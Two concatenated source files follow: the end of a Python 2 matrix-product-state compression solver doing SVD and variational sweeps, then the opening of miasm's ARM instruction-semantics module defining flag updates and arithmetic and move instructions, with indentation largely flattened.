s_dim= self.bound_dimension
U=U[:, 0:s_dim]
s1=np.diag(s)[0:s_dim, 0:s_dim]
V=V[0:s_dim, :]
self.mpsc[-1]=np.reshape(U,(self.mpsc[-1].shape[0],self.mpsc[-1].shape[1],U.shape[1]))
B=np.dot(s1,V)
self.mpsc.append( np.tensordot(self.mps[i+1],B,axes=([1],[1])) )
self.mpsc[-1]=np.swapaxes(self.mpsc[-1],1,2)
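#A self-contained illustration of the truncation step above (hypothetical
#helper, not part of the solver's API): keep the leading s_dim singular
#triplets of a matrix; the Frobenius error equals the norm of the dropped tail.
def _svdTruncateDemo(self, s_dim=2):
    import numpy as np
    A = np.random.rand(6, 5)
    U, s, V = np.linalg.svd(A, full_matrices=False)
    A_trunc = np.dot(U[:, :s_dim] * s[:s_dim], V[:s_dim, :])
    tail = np.sqrt(np.sum(s[s_dim:] ** 2))
    assert abs(np.linalg.norm(A - A_trunc) - tail) < 1e-10
    return A_trunc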
def compressionSVDSweepToLeft(self):
# First store mpsc in a reverse order
self.mpsc = []
self.mpsc.append(self.mps[self.L-1])
for i in range(self.L-1, 0, -1):
A=np.swapaxes(self.mpsc[-1],1,2)
A=np.reshape(A,(A.shape[0]*A.shape[1],A.shape[2]))
U, s, V=np.linalg.svd(A, full_matrices=False)
s_dim= self.bound_dimension
U=U[:, 0:s_dim]
s1=np.diag(s)[0:s_dim, 0:s_dim]
V=V[0:s_dim, :]
self.mpsc[-1]=np.reshape(U,(self.mpsc[-1].shape[0],self.mpsc[-1].shape[2],U.shape[1]))
self.mpsc[-1]=np.swapaxes(self.mpsc[-1],1,2)
B=np.dot(s1,V)
self.mpsc.append( np.tensordot(self.mps[i-1],B,axes=([2],[1])) )
self.mpsc.reverse()
#apply mpo on the current compressed mps (mpsc). store the result on variable mps
#convention for mpo: phys_in, phys_out, aux_l, aux_r
#convention for mps: phys, aux_l, aux_r
def contraction(self):
for i in range(0,self.L):
A=np.tensordot(self.mpo[i],self.mpsc[i],axes=([0],[0]))
A=np.swapaxes(A,2,3)
self.mps[i]=np.reshape(A,(A.shape[0], A.shape[1]*A.shape[2], A.shape[3]*A.shape[4]))
#overlap two mps, output <mps1,mps2>
def overlap(self,mps1,mps2):
result=np.tensordot(mps1[0],mps2[0],axes=([0],[0]))
result=result[0,:,0,:]
#result=np.swapaxes(result,1,2)
L=len(mps1)
if len(mps2)!=L:
raise Exception("Cannot overlap two mps with different lengths")
for i in range(L-1):
B=np.tensordot(mps1[i+1],mps2[i+1],axes=([0],[0]))
result=np.tensordot(result,B,axes=([0,1],[0,2]))
#result=np.tensordot(result,B,axes=([2,3],[0,2]))
return result
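#Brute-force cross-check of overlap() on a tiny 2-site chain (hypothetical
#demo method with illustrative shapes): contract each MPS into a full
#vector and compare the dot product with the result of overlap() above.
def _overlapBruteForceDemo(self):
    import numpy as np
    m1 = [np.random.rand(2, 1, 3), np.random.rand(2, 3, 1)]
    m2 = [np.random.rand(2, 1, 3), np.random.rand(2, 3, 1)]
    # full amplitudes; size-1 aux indices are summed out by einsum
    psi1 = np.einsum('iab,jbc->ij', m1[0], m1[1])
    psi2 = np.einsum('iab,jbc->ij', m2[0], m2[1])
    direct = np.sum(psi1 * psi2)
    assert np.allclose(self.overlap(m1, m2), direct)
    return direct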
#left-normalize the MPS from the left end to MPS[l]
def leftNormalize(self,l):
for i in range(0,l-1):
A=np.reshape(self.mps[i],(self.mps[i].shape[0]*self.mps[i].shape[1],self.mps[i].shape[2]))
U, s, V=np.linalg.svd(A, full_matrices=False)
self.mps[i]=np.reshape(U,(self.mps[i].shape[0],self.mps[i].shape[1],U.shape[1]))
B=np.dot(np.diag(s),V)
self.mps[i+1]=np.tensordot(self.mps[i+1],B,axes=([1],[1]))
self.mps[i+1]=np.swapaxes(self.mps[i+1],1,2)
#right-normalize the MPS from the right end to MPS[l]
def rightNormalize(self,l):
L=len(self.mps)
for i in range(L-l-1):
A=np.swapaxes(self.mps[L-1-i],1,2)
A=np.reshape(A,(A.shape[0]*A.shape[1],A.shape[2]))
U, s, V=np.linalg.svd(A, full_matrices=False)
self.mps[L-1-i]=np.reshape(U,(self.mps[L-1-i].shape[0],self.mps[L-1-i].shape[2],U.shape[1]))
self.mps[L-1-i]=np.swapaxes(self.mps[L-1-i],1,2)
B=np.dot(np.diag(s),V)
self.mps[L-2-i]=np.tensordot(self.mps[L-2-i],B,axes=([2],[1]))
#obtain a mixed-canonical form centered on MPS[l]
def mixedCanonize(self,l):
self.leftNormalize(l);
self.rightNormalize(l);
'''
The following code implements the Compression by variation.
'''
#Form an initial guess for mpsc, and right- or left-normalize it depending on the direction of the first sweep.
#The result serves as the starting point for the iterations
def initializeMpscVar(self,direction):
self.mpsc=[];
#new_mps=np.zeros(shape=(n,1,d),dtype=float);
#new_mps=np.random.rand(self.n,1,self.bound_dimension);
new_mps=np.ones(shape=(self.n,1,self.bound_dimension),dtype=float)
self.mpsc.append(new_mps)
mpsc_module=np.tensordot(self.mpsc[0],self.mpsc[0],axes=([0],[0]))
mpsc_module=mpsc_module[0,:,0,:]
for i in range(1,self.L-1):
#new_mps=np.zeros(shape=(n,d,d),dtype=float);
#new_mps=np.random.rand(self.n,self.bound_dimension,self.bound_dimension);
new_mps=np.ones(shape=(self.n,self.bound_dimension,self.bound_dimension),dtype=float)
self.mpsc.append(new_mps)
B=np.tensordot(self.mpsc[i],self.mpsc[i],axes=([0],[0]))
mpsc_module=np.tensordot(mpsc_module,B,axes=([0,1],[0,2]))
#new_mps=np.zeros(shape=(2,d,1),dtype=float)
#new_mps=np.random.rand(self.n,self.bound_dimension,1)
new_mps=np.ones(shape=(self.n,self.bound_dimension,1),dtype=float)
self.mpsc.append(new_mps)
B=np.tensordot(self.mpsc[self.L-1],self.mpsc[self.L-1],axes=([0],[0]))
self.cpr_err=np.tensordot(mpsc_module,B,axes=([0,1],[0,2]))
#right-normalize the states if the first sweep is from left to right
if (direction==0):
for i in range(self.L-1):
A=np.swapaxes(self.mpsc[self.L-1-i],1,2)
A=np.reshape(A,(A.shape[0]*A.shape[1],A.shape[2]))
U, s, V=np.linalg.svd(A, full_matrices=False)
self.mpsc[self.L-1-i]=np.reshape(U,(self.mpsc[self.L-1-i].shape[0],self.mpsc[self.L-1-i].shape[2],U.shape[1]))
self.mpsc[self.L-1-i]=np.swapaxes(self.mpsc[self.L-1-i],1,2)
B=np.dot(np.diag(s),V)
self.mpsc[self.L-2-i]=np.tensordot(self.mpsc[self.L-2-i],B,axes=([2],[1]))
#left-normalize the states if the first sweep is from right to left
else:
for i in range(self.L-1):
A=np.reshape(self.mpsc[i],(self.mpsc[i].shape[0]*self.mpsc[i].shape[1],self.mpsc[i].shape[2]))
U, s, V=np.linalg.svd(A, full_matrices=False)
self.mpsc[i]=np.reshape(U,(self.mpsc[i].shape[0],self.mpsc[i].shape[1],U.shape[1]))
B=np.dot(np.diag(s),V)
self.mpsc[i+1]=np.tensordot(self.mpsc[i+1],B,axes=([1],[1]))
self.mpsc[i+1]=np.swapaxes(self.mpsc[i+1],1,2)
#Initialize the list of partial overlap, depending on the direction of first compression sweep.
def initializePartialOvl(self,direction):
#If the first sweep is from left to right, we initialize the right to left partial overlap list.
if (direction==0):
self.partial_overlap_rl[self.L-1]=np.tensordot(self.mpsc[self.L-1],self.mps[self.L-1],axes=([0],[0]));
self.partial_overlap_rl[self.L-1]=self.partial_overlap_rl[self.L-1][:,0,:,0];
for i in range(self.L-1):
A=np.tensordot(self.mpsc[self.L-2-i],self.mps[self.L-2-i],axes=([0],[0]))
self.partial_overlap_rl[self.L-2-i]=np.tensordot(A,self.partial_overlap_rl[self.L-1-i],axes=([1,3],[0,1]))
self.cpr_err=self.cpr_err-2*self.partial_overlap_rl[0]
#If the first sweep is from right to left, we initialize the left to right partial overlap list.
elif (direction==1):
self.partial_overlap_lr[0]=np.tensordot(self.mpsc[0],self.mps[0],axes=([0],[0]));
self.partial_overlap_lr[0]=self.partial_overlap_lr[0][0,:,0,:];
for i in range(self.L-1):
A=np.tensordot(self.mpsc[i+1],self.mps[i+1],axes=([0],[0]))
self.partial_overlap_lr[i+1]=np.tensordot(A,self.partial_overlap_lr[i],axes=([0,2],[0,1]))
self.cpr_err=self.cpr_err-2*self.partial_overlap_lr[self.L-1]
#Perform a single sweep from left to right
#Normalize the mpsc after each sweep if input norm=1
def compressionSweepLeftRight(self,norm):
A=np.tensordot(self.mps[0],self.partial_overlap_rl[1],axes=([2],[1]))
#perform left normalization
A=np.reshape(A,(A.shape[0],A.shape[2]))
U, s, V=np.linalg.svd(A, full_matrices=False)
self.mpsc[0]=np.reshape(U,(A.shape[0],1,U.shape[1]))
##Update partialoverlap list (direction left to right)
self.partial_overlap_lr[0]=np.tensordot(self.mpsc[0],self.mps[0],axes=([0],[0]))
self.partial_overlap_lr[0]=self.partial_overlap_lr[0][0,:,0,:]
mpsc_module=np.tensordot(self.mpsc[0],self.mpsc[0],axes=([0],[0]))
mpsc_module=mpsc_module[0,:,0,:]
self.l1_norm=np.sum(self.mpsc[0],axis=0)
for i in range(self.L-2):
A=np.tensordot(self.mps[i+1],self.partial_overlap_rl[i+2],axes=([2],[1]))
A=np.tensordot(self.partial_overlap_lr[i],A,axes=([1],[1]))
A=np.swapaxes(A,0,1)
#perform left normalization
mA=A.shape[0]
nA=A.shape[1]
A=np.reshape(A,(mA*nA,A.shape[2]))
U, s, V=np.linalg.svd(A, full_matrices=False)
self.mpsc[i+1]=np.reshape(U,(mA,nA,U.shape[1]))
##Update partialoverlap list (direction left to right)
A=np.tensordot(self.mpsc[i+1],self.mps[i+1],axes=([0],[0]))
self.partial_overlap_lr[i+1]=np.tensordot(self.partial_overlap_lr[i],A,axes=([0,1],[0,2]))
B=np.tensordot(self.mpsc[i+1],self.mpsc[i+1],axes=([0],[0]))
mpsc_module=np.tensordot(mpsc_module,B,axes=([0,1],[0,2]))
C=np.sum(self.mpsc[i+1],axis=0)
self.l1_norm=np.dot(self.l1_norm,C)
A=np.tensordot(self.partial_overlap_lr[self.L-2],self.mps[self.L-1],axes=([1],[1]))
self.mpsc[self.L-1]=np.swapaxes(A,0,1)
#no need to left-normalize the right-most MPS, we update partialoverlap list
#this gives us <mpsc,mps> at the end of the iteration
A=np.tensordot(self.mpsc[self.L-1],self.mps[self.L-1],axes=([0],[0]))
self.partial_overlap_lr[self.L-1]=np.tensordot(self.partial_overlap_lr[self.L-2],A,axes=([0,1],[0,2]))
B=np.tensordot(self.mpsc[self.L-1],self.mpsc[self.L-1],axes=([0],[0]))
mpsc_module=np.tensordot(mpsc_module,B,axes=([0,1],[0,2]))
self.cpr_err=mpsc_module-2*self.partial_overlap_lr[self.L-1]
C=np.sum(self.mpsc[self.L-1],axis=0)
self.l1_norm=np.dot(self.l1_norm,C)
self.l1_norm=float(self.l1_norm)
#normalize the states if required by the user
if (norm==1):
try:
Ka=self.l1_norm**(1.0/self.L)
self.mpsc=[(self.mpsc[n])/Ka for n in range(self.L)]
self.cpr_err=mpsc_module/(self.l1_norm*self.l1_norm)-2*self.partial_overlap_lr[self.L-1]/self.l1_norm
self.partial_overlap_lr=[(self.partial_overlap_lr[n])/(Ka**(n+1)) for n in range(self.L)]
self.negative_norm_flag=0
except ValueError:
print "Warning: Negative norm ("+str(self.l1_norm)+") obtained at t="+str(self.t+1)+", maybe stuck in a local minimum."
print "Try to increase epsilon or decrease the number of sweeps and call compressionVariational() again."
self.negative_norm_flag=1
#Perform a single sweep from right to left
#Normalize the mpsc after each sweep if input norm=1
def compressionSweepRightLeft(self,norm):
A=np.tensordot(self.mps[self.L-1],self.partial_overlap_lr[self.L-2],axes=([1],[1]))
#perform right normalization
mA=A.shape[0]
nA=A.shape[1]
A=np.reshape(A,(mA*nA,A.shape[2]))
U, s, V=np.linalg.svd(A, full_matrices=False)
U=np.reshape(U,(mA,nA,U.shape[1]))
self.mpsc[self.L-1]=np.swapaxes(U,1,2)
##Update partialoverlap list (direction right to left)
self.partial_overlap_rl[self.L-1]=np.tensordot(self.mpsc[self.L-1],self.mps[self.L-1],axes=([0],[0]))
self.partial_overlap_rl[self.L-1]=self.partial_overlap_rl[self.L-1][:,0,:,0]
mpsc_module=np.tensordot(self.mpsc[self.L-1],self.mpsc[self.L-1],axes=([0],[0]))
mpsc_module=mpsc_module[:,0,:,0]
self.l1_norm=np.sum(self.mpsc[self.L-1],axis=0)
for i in range(self.L-2):
A=np.tensordot(self.mps[self.L-2-i],self.partial_overlap_rl[self.L-1-i],axes=([2],[1]))
A=np.tensordot(A,self.partial_overlap_lr[self.L-3-i],axes=([1],[1]))
#perform right normalization
mA=A.shape[0]
nA=A.shape[1]
A=np.reshape(A,(mA*nA,A.shape[2]))
U, s, V=np.linalg.svd(A, full_matrices=False)
U=np.reshape(U,(mA,nA,U.shape[1]))
self.mpsc[self.L-i-2]=np.swapaxes(U,1,2)
##Update partialoverlap list (direction right to left)
A=np.tensordot(self.mpsc[self.L-i-2],self.mps[self.L-i-2],axes=([0],[0]))
self.partial_overlap_rl[self.L-i-2]=np.tensordot(self.partial_overlap_rl[self.L-i-1],A,axes=([0,1],[1,3]))
B=np.tensordot(self.mpsc[self.L-i-2],self.mpsc[self.L-i-2],axes=([0],[0]))
mpsc_module=np.tensordot(mpsc_module,B,axes=([0,1],[1,3]))
C=np.sum(self.mpsc[self.L-i-2],axis=0)
self.l1_norm=np.dot(C,self.l1_norm)
self.mpsc[0]=np.tensordot(self.mps[0],self.partial_overlap_rl[1],axes=([2],[1]))
#no need to right-normalize the left-most MPS, we update the partial overlap list
#this gives us <mpsc,mps> at the end of the iteration
A=np.tensordot(self.mpsc[0],self.mps[0],axes=([0],[0]))
self.partial_overlap_rl[0]=np.tensordot(self.partial_overlap_rl[1],A,axes=([0,1],[1,3]))
B=np.tensordot(self.mpsc[0],self.mpsc[0],axes=([0],[0]))
mpsc_module=np.tensordot(mpsc_module,B,axes=([0,1],[1,3]))
self.cpr_err=mpsc_module-2*self.partial_overlap_rl[0]
C=np.sum(self.mpsc[0],axis=0)
self.l1_norm=np.dot(C,self.l1_norm)
self.l1_norm=float(self.l1_norm)
#normalize the states if required by the user
if (norm==1):
try:
Ka=self.l1_norm**(1.0/self.L)
self.mpsc=[(self.mpsc[n])/Ka for n in range(self.L)]
self.cpr_err=mpsc_module/(self.l1_norm**2)-2*self.partial_overlap_rl[0]/self.l1_norm
self.partial_overlap_rl=[(self.partial_overlap_rl[n])/(Ka**(self.L-n)) for n in range(self.L)]
self.negative_norm_flag=0
except ValueError:
print "Warning: Negative norm ("+str(self.l1_norm)+") obtained at t="+str(self.t+1)+", maybe stuck in a local minimum."
print "Try to increase epsilon or decrease the number of sweeps and call compressionVariational() again."
self.negative_norm_flag=1
#main routine for compression by variation. Options:
#direction: choose the direction for first sweep, 0 for left to right and 1 for right to left.
#sweep_nbr: choose the number of sweeps. If sweep_nbr=0 then sweep until converge.
#norm: choose whether to normalize the states after each sweep.
#If norm=0, then the normalization will take place after all sweeps
#If norm=1, then the mpsc is normalized after each sweep.
def compressionVariational(self,direction=0,sweep_nbr=0,norm=0):
"""
The compression based on the variational principle, to be implemented by Peiqi Wang
"""
##form a initial guess
#self.compressionSVDSweepToLeft()
self.initializeMpscVar(direction)
##Initialize Partial Overlap lists
self.initializePartialOvl(direction)
##Calculate the L2 norm of the MPS to be compressed
error=10000
##Direction of previous sweep. 0 means left to right and 1 means right to left
last_direction=1-direction
if (sweep_nbr==0):
sweep=0
#sweep until converge
while (error>self.epsil):
if (last_direction==1):
last_cpr_err=self.cpr_err
self.compressionSweepLeftRight(norm)
# print(self.l1_norm) # show the L1 norm of mpsc
error=abs(last_cpr_err-self.cpr_err)
last_direction = 0
sweep=sweep+1
elif (last_direction==0):
last_cpr_err=self.cpr_err
self.compressionSweepRightLeft(norm)
# print(self.l1_norm) # show the L1 norm of mpsc
error=abs(last_cpr_err-self.cpr_err)
last_direction = 1
sweep=sweep+1
#number of sweeps performed
# print(sweep)
if (norm==0):
self.normalizeProba()
else:
#sweep exactly as many times as the user requires
for sweep in range(sweep_nbr):
if (last_direction==1):
last_cpr_err=self.cpr_err
self.compressionSweepLeftRight(norm)
# print(self.l1_norm) # show the L1 norm of mpsc
error=abs(last_cpr_err-self.cpr_err)
last_direction = 0
elif (last_direction==0):
last_cpr_err=self.cpr_err
self.compressionSweepRightLeft(norm)
# print(self.l1_norm) # show the L1 norm of mpsc
error=abs(last_cpr_err-self.cpr_err)
last_direction = 1
if (norm==0):
self.normalizeProba()
def normalizeProba(self):
try:
Ka=self.l1_norm**(1.0/self.L)
self.mpsc=[(self.mpsc[n])/Ka for n in range(self.L)]
self.negative_norm_flag=0
except ValueError:
print "Warning: Negative norm ("+str(self.l1_norm)+") obtained at t="+str(self.t+1)+", maybe stuck in a local minimum."
print "Try to increase epsilon or decrease the number of sweeps and call compressionVariational() again."
self.negative_norm_flag=1
| binarybin/MPS_Proba | src/mpssolver.py | Python | gpl-2.0 | 21,994 |
from builtins import range
from future.utils import viewitems, viewvalues
from miasm.expression.expression import *
from miasm.ir.ir import IntermediateRepresentation, IRBlock, AssignBlock
from miasm.arch.arm.arch import mn_arm, mn_armt
from miasm.arch.arm.regs import *
from miasm.jitter.csts import EXCEPT_DIV_BY_ZERO, EXCEPT_INT_XX
# liris.cnrs.fr/~mmrissa/lib/exe/fetch.php?media=armv7-a-r-manual.pdf
EXCEPT_SOFT_BP = (1 << 1)
EXCEPT_PRIV_INSN = (1 << 17)
# CPSR: N Z C V
def update_flag_zf(a):
return [ExprAssign(zf, ExprOp("FLAG_EQ", a))]
def update_flag_zf_eq(a, b):
return [ExprAssign(zf, ExprOp("FLAG_EQ_CMP", a, b))]
def update_flag_nf(arg):
return [
ExprAssign(
nf,
ExprOp("FLAG_SIGN_SUB", arg, ExprInt(0, arg.size))
)
]
def update_flag_zn(a):
e = []
e += update_flag_zf(a)
e += update_flag_nf(a)
return e
# XXX TODO: set cf if ROT imm in argument
def check_ops_msb(a, b, c):
if not a or not b or not c or a != b or a != c:
raise ValueError('bad ops size %s %s %s' % (a, b, c))
def update_flag_add_cf(op1, op2):
"Compute cf in @op1 + @op2"
return [ExprAssign(cf, ExprOp("FLAG_ADD_CF", op1, op2))]
def update_flag_add_of(op1, op2):
"Compute of in @op1 + @op2"
return [ExprAssign(of, ExprOp("FLAG_ADD_OF", op1, op2))]
def update_flag_sub_cf(op1, op2):
"Compote CF in @op1 - @op2"
return [ExprAssign(cf, ExprOp("FLAG_SUB_CF", op1, op2) ^ ExprInt(1, 1))]
def update_flag_sub_of(op1, op2):
"Compote OF in @op1 - @op2"
return [ExprAssign(of, ExprOp("FLAG_SUB_OF", op1, op2))]
def update_flag_arith_add_co(arg1, arg2):
e = []
e += update_flag_add_cf(arg1, arg2)
e += update_flag_add_of(arg1, arg2)
return e
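# Concrete 32-bit meaning of the FLAG_ADD_CF / FLAG_ADD_OF operators built
# above, as a plain-integer sketch (illustrative only; miasm evaluates the
# symbolic ExprOp forms elsewhere). Inputs are assumed already masked to
# 32 bits.
def _add_flags_concrete(op1, op2):
    mask = 0xFFFFFFFF
    r = (op1 + op2) & mask
    cf = int(op1 + op2 > mask)  # unsigned carry out of bit 31
    sign = lambda v: (v >> 31) & 1
    of = int(sign(op1) == sign(op2) and sign(r) != sign(op1))  # signed overflow
    return r, cf, of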
def update_flag_arith_add_zn(arg1, arg2):
"""
Compute zf and nf flags for (arg1 + arg2)
"""
e = []
e += update_flag_zf_eq(arg1, -arg2)
e += [ExprAssign(nf, ExprOp("FLAG_SIGN_SUB", arg1, -arg2))]
return e
def update_flag_arith_sub_co(arg1, arg2):
"""
Compute cf and of flags for (arg1 - arg2)
"""
e = []
e += update_flag_sub_cf(arg1, arg2)
e += update_flag_sub_of(arg1, arg2)
return e
def update_flag_arith_sub_zn(arg1, arg2):
"""
Compute zf and nf flags for (arg1 - arg2)
"""
e = []
e += update_flag_zf_eq(arg1, arg2)
e += [ExprAssign(nf, ExprOp("FLAG_SIGN_SUB", arg1, arg2))]
return e
def update_flag_zfaddwc_eq(arg1, arg2, arg3):
return [ExprAssign(zf, ExprOp("FLAG_EQ_ADDWC", arg1, arg2, arg3))]
def update_flag_zfsubwc_eq(arg1, arg2, arg3):
return [ExprAssign(zf, ExprOp("FLAG_EQ_SUBWC", arg1, arg2, arg3))]
def update_flag_arith_addwc_zn(arg1, arg2, arg3):
"""
Compute znp flags for (arg1 + arg2 + cf)
"""
e = []
e += update_flag_zfaddwc_eq(arg1, arg2, arg3)
e += [ExprAssign(nf, ExprOp("FLAG_SIGN_ADDWC", arg1, arg2, arg3))]
return e
def update_flag_arith_subwc_zn(arg1, arg2, arg3):
"""
Compute znp flags for (arg1 - (arg2 + cf))
"""
e = []
e += update_flag_zfsubwc_eq(arg1, arg2, arg3)
e += [ExprAssign(nf, ExprOp("FLAG_SIGN_SUBWC", arg1, arg2, arg3))]
return e
def update_flag_addwc_cf(op1, op2, op3):
"Compute cf in @res = @op1 + @op2 + @op3"
return [ExprAssign(cf, ExprOp("FLAG_ADDWC_CF", op1, op2, op3))]
def update_flag_addwc_of(op1, op2, op3):
"Compute of in @res = @op1 + @op2 + @op3"
return [ExprAssign(of, ExprOp("FLAG_ADDWC_OF", op1, op2, op3))]
def update_flag_arith_addwc_co(arg1, arg2, arg3):
e = []
e += update_flag_addwc_cf(arg1, arg2, arg3)
e += update_flag_addwc_of(arg1, arg2, arg3)
return e
def update_flag_subwc_cf(op1, op2, op3):
"Compute cf in @res = @op1 + @op2 + @op3"
return [ExprAssign(cf, ExprOp("FLAG_SUBWC_CF", op1, op2, op3) ^ ExprInt(1, 1))]
def update_flag_subwc_of(op1, op2, op3):
"Compute of in @res = @op1 + @op2 + @op3"
return [ExprAssign(of, ExprOp("FLAG_SUBWC_OF", op1, op2, op3))]
def update_flag_arith_subwc_co(arg1, arg2, arg3):
e = []
e += update_flag_subwc_cf(arg1, arg2, arg3)
e += update_flag_subwc_of(arg1, arg2, arg3)
return e
def get_dst(a):
if a == PC:
return PC
return None
# instruction definition ##############
def adc(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
arg1, arg2 = b, c
r = b + c + cf.zeroExtend(32)
if instr.name == 'ADCS' and a != PC:
e += update_flag_arith_addwc_zn(arg1, arg2, cf)
e += update_flag_arith_addwc_co(arg1, arg2, cf)
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def add(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
arg1, arg2 = b, c
r = b + c
if instr.name == 'ADDS' and a != PC:
e += update_flag_arith_add_zn(arg1, arg2)
e += update_flag_arith_add_co(arg1, arg2)
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def l_and(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
r = b & c
if instr.name == 'ANDS' and a != PC:
e += [ExprAssign(zf, ExprOp('FLAG_EQ_AND', b, c))]
e += update_flag_nf(r)
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def sub(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
r = b - c
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def subs(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
arg1, arg2 = b, c
r = b - c
e += update_flag_arith_sub_zn(arg1, arg2)
e += update_flag_arith_sub_co(arg1, arg2)
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def eor(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
r = b ^ c
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def eors(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
arg1, arg2 = b, c
r = arg1 ^ arg2
e += [ExprAssign(zf, ExprOp('FLAG_EQ_CMP', arg1, arg2))]
e += update_flag_nf(r)
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def rsb(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
arg1, arg2 = c, b
r = arg1 - arg2
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def rsbs(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
arg1, arg2 = c, b
r = arg1 - arg2
e += update_flag_arith_sub_zn(arg1, arg2)
e += update_flag_arith_sub_co(arg1, arg2)
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def sbc(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
arg1, arg2 = b, c
r = arg1 - (arg2 + (~cf).zeroExtend(32))
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def sbcs(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
arg1, arg2 = b, c
r = arg1 - (arg2 + (~cf).zeroExtend(32))
e += update_flag_arith_subwc_zn(arg1, arg2, ~cf)
e += update_flag_arith_subwc_co(arg1, arg2, ~cf)
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def rsc(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
arg1, arg2 = c, b
r = arg1 - (arg2 + (~cf).zeroExtend(32))
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def rscs(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
arg1, arg2 = c, b
r = arg1 - (arg2 + (~cf).zeroExtend(32))
e += update_flag_arith_subwc_zn(arg1, arg2, ~cf)
e += update_flag_arith_subwc_co(arg1, arg2, ~cf)
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def tst(ir, instr, a, b):
e = []
arg1, arg2 = a, b
r = arg1 & arg2
e += [ExprAssign(zf, ExprOp('FLAG_EQ_AND', arg1, arg2))]
e += update_flag_nf(r)
return e, []
def teq(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
arg1, arg2 = b, c
r = arg1 ^ arg2
e += [ExprAssign(zf, ExprOp('FLAG_EQ_CMP', arg1, arg2))]
e += update_flag_nf(r)
return e, []
def l_cmp(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
arg1, arg2 = b, c
e += update_flag_arith_sub_zn(arg1, arg2)
e += update_flag_arith_sub_co(arg1, arg2)
return e, []
def cmn(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
arg1, arg2 = b, c
e += update_flag_arith_add_zn(arg1, arg2)
e += update_flag_arith_add_co(arg1, arg2)
return e, []
def orr(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
r = b | c
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def orn(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
r = ~(b | c)
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def orrs(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
arg1, arg2 = b, c
r = arg1 | arg2
e += [ExprAssign(zf, ExprOp('FLAG_EQ', r))]
e += update_flag_nf(r)
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def mov(ir, instr, a, b):
e = [ExprAssign(a, b)]
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, b))
return e, []
def movt(ir, instr, a, b):
r = a | b << ExprInt(16, 32)
e = [ExprAssign(a, r)]
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def movs(ir, instr, a, b):
e = []
e.append(ExprAssign(a, b))
# XXX TODO check
e += [ExprAssign(zf, ExprOp('FLAG_EQ', b))]
e += update_flag_nf(b)
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, b))
return e, []
def mvn(ir, instr, a, b):
r = b ^ ExprInt(-1, 32)
e = [ExprAssign(a, r)]
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def mvns(ir, instr, a, b):
e = []
r = b ^ ExprInt(-1, 32)
e.append(ExprAssign(a, r))
# XXX TODO check
e += [ExprAssign(zf, ExprOp('FLAG_EQ', r))]
e += update_flag_nf(r)
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def mrs(ir, instr, a, b):
e = []
if b.is_id('CPSR_cxsf'):
out = []
out.append(ExprInt(0x10, 28))
out.append(of)
out.append(cf)
out.append(zf)
out.append(nf)
e.append(ExprAssign(a, ExprCompose(*out)))
else:
raise NotImplementedError("MRS not implemented")
return e, []
def msr(ir, instr, a, b):
e = []
if a.is_id('CPSR_cf'):
e.append(ExprAssign(nf, b[31:32]))
e.append(ExprAssign(zf, b[30:31]))
e.append(ExprAssign(cf, b[29:30]))
e.append(ExprAssign(of, b[28:29]))
else:
raise NotImplementedError("MSR not implemented")
return e, []
def neg(ir, instr, a, b):
e = []
r = - b
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
